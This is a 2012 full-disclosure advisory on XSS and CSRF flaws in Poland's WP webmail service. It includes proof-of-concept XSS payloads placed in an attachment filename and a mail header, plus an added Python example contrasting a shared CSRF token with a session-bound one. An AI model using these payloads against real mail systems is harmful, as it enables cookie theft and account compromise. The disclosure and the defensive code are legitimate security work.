Thursday, 6 December 2012

[Full Disclosure] Poczta.WP Multiple vulnerabilities


Poczta.WP Multiple vulnerabilities full disclosure

Author: Jakub Zoczek [zoczus(x)]

0x01 Intro

Wirtualna Polska S.A. (WP) is one of the largest Polish web portals.
Their email service ( is affected by multiple cross-site
scripting vulnerabilities and also one almost-fixed cross-site
request forgery bug. After a long time of waiting, I got a
non-professional answer from the Customer Service Manager of WP, so I
decided to post all my research here. Thus...

0x02 XSS in mail attachments.
Reported: 10/10/2012
State: Fixed

Proof Of Concept:

For example - jpeg picture with filename:

sowa oraz "> inject <img src="boom.jpg" onerror="alert(document.cookie);"> hhh.jpg

..sent as e-mail attachment.


0x03 XSRF in AntyHack and AntySpam filter (adding to white list)

Reported: 24/11/2012
State: "Fixed"

Proof Of Concept:


0x04 XSRF in AntyHack and AntySpam filter - bypassing 'fix' ;)

Reported: 04/12/2012
State: Not fixed

Proof Of Concept:

Additional info for 0x03 - as I supposed, WP used the token in a
white list form (every once in a while generated md5 of something).
The problem is that the token value is probably the same for each
user. For different mail accounts, different browsers, different IP
addresses - the token is the same... Bypassing this protection seems
to be quite simple.

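
Why a token that is identical for every user gives no request-forgery protection, shown beside a session-bound alternative. This is an added example, not code from WP or from the original report; the clock-window md5, SERVER_KEY, ACTION and all function names are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
import time

SERVER_KEY = secrets.token_bytes(32)  # hypothetical per-deployment secret
ACTION = "whitelist/add"              # hypothetical name for the form

def weak_issue(session_id, now, window=3600):
    # Assumption: the page only says "md5 of something", regenerated every
    # once in a while; a clock-window hash stands in. session_id is ignored.
    return hashlib.md5(str(int(now // window)).encode()).hexdigest()

def weak_check(token, session_id, now):
    return hmac.compare_digest(token, weak_issue(session_id, now))

def bound_issue(session_id, now=None):
    # HMAC-SHA256 over session id and action: unique per session, per form.
    msg = f"{session_id}|{ACTION}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()

def bound_check(token, session_id, now=None):
    return hmac.compare_digest(token, bound_issue(session_id))

def replay_accepted(issue, check):
    """Issue a token to session A, submit it in session B; True means the
    token is not user-bound and gives no CSRF protection."""
    now = time.time()
    session_a, session_b = secrets.token_hex(16), secrets.token_hex(16)  # constructed
    token_a = issue(session_a, now)
    assert check(token_a, session_a, now)  # sanity: the owner is accepted
    return check(token_a, session_b, now)

if __name__ == "__main__":
    print("shared token replay accepted:", replay_accepted(weak_issue, weak_check))
    print("bound token replay accepted: ", replay_accepted(bound_issue, bound_check))
```

The same replay check works as a regression test against a real deployment: request the form from two independent test accounts and compare the token values.
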
0x05 XSS in mail headers

Reported: 04/12/2012
State: Not fixed

Proof Of Concept:

Return-Path: <zoczus () fbi pl>
Delivered-To: zoczus () wp pl (zoczus)
Received: (wp-smtpd 10088 invoked from network); 30 Nov 2012 16:04:58 +0100
Received: from ([]) (envelope-sender <zoczus () fbi pl>) by (WP-SMTPD) with SMTP for <zoczus () wp pl>; 30 Nov 2012 16:04:58 +0100
Received: by (Postfix, from userid 33) id D4119D5807; Fri, 30 Nov 2012 16:04:57 +0100 (CET)
To: zoczus () wp pl
Subject:
From: "zoczus () fbi pl" <zoczus () fbi pl>
Head<img/src="a"/onerror="alert(document.location)">er: dont have spaces
X-Priority: 3 (Normal)
Importance: Normal
Errors-To: zoczus () fbi pl
Reply-To: zoczus () fbi pl
Content-Type: text/plain; charset=utf-8
Message-Id: <20121130150457.D4119D5807 () emkei cz>
Date: Fri, 30 Nov 2012 16:04:57 +0100 (CET)
X-WP-DKIM-Status: no signature (id: n/a)
X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A.
X-WP-SPAM: NO (UW) 0000010 [8Wph]

Dobre!

Result:

0x06 The end. :)

The above bugs were fixed very quickly after the report was published.

